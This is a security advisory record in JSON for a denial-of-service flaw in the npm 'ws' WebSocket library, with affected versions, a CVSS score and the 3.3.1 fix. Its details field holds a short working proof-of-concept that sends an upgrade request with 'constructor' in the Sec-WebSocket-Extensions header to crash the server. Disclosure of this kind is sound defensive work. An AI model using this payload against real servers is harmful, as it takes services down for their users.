{ "schema_version": "1.4.0", "id": "GHSA-5v72-xg48-5rpm", "modified": "2021-08-04T21:29:05Z", "published": "2019-06-04T19:37:52Z", "aliases": [], "summary": "Denial of Service in ws", "details": "Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r\\n'\n ].join('\\r\\n');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "ws" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.2.6" }, { "fixed": "1.1.5" } ] } ] }, { "package": { "ecosystem": "npm", "name": "ws" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "3.3.1" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:ws:20171108" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/550/versions" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-06-04T19:37:42Z", "nvd_published_at": null } }